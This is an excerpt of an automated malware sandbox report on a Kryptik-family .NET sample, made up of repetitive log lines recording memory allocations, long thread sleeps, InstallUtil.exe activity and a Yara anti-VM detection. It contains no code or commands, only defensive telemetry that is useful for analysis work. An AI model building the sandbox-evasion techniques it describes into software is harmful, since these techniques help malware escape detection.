Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe PID: 5768, type: MEMORYSTR

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Memory allocated: 11B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Memory allocated: 2EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Memory allocated: 1450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Memory allocated: 6320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Memory allocated: 7320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Memory allocated: 7460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Memory allocated: 8460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Memory allocated: 86D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Memory allocated: 86D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Memory allocated: 9B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Memory allocated: AB10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Memory allocated: 6D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Memory allocated: 8460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 4330000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599868	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599525	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599183	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599077	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598202	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596670	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595795	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595317	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594422	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 2263			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 7593			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe TID: 1528	Thread sleep time: -59000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe TID: 7068	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe TID: 7620	Thread sleep time: -44000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe TID: 5660	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6764	Thread sleep count: 2263 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -599868s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6764	Thread sleep count: 7593 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -599750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -599640s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -599525s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -599406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -599296s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -599183s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -599077s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -598968s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -598859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -598750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -598640s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -598421s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -598202s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -598093s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -597218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -596890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -596780s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -596670s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -596562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -596343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -596234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -596125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -596015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -595795s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -595671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -595561s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -595317s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7632	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -594969s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -594750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -594640s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -594531s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -594422s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599868	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599525	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599183	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599077	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598202	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596670	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595795	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595317	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594422	Jump to behavior

